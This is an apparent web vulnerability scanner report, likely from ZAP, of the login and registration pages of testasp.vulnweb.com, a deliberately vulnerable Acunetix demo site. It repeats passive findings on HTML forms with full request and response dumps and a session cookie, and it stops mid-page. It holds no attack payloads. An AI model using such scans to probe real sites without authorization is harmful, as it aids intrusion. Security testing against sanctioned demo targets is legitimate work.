<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=5 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=6 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=7 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=8 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=9 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 399 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Templatize.asp?item=html/about.html Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:23 GMT Content-Length: 3256 |
| Response Body - size: 3,256 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 3615 |
| Response Body - size: 3,615 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 347 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 3613 |
| Response Body - size: 3,613 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" 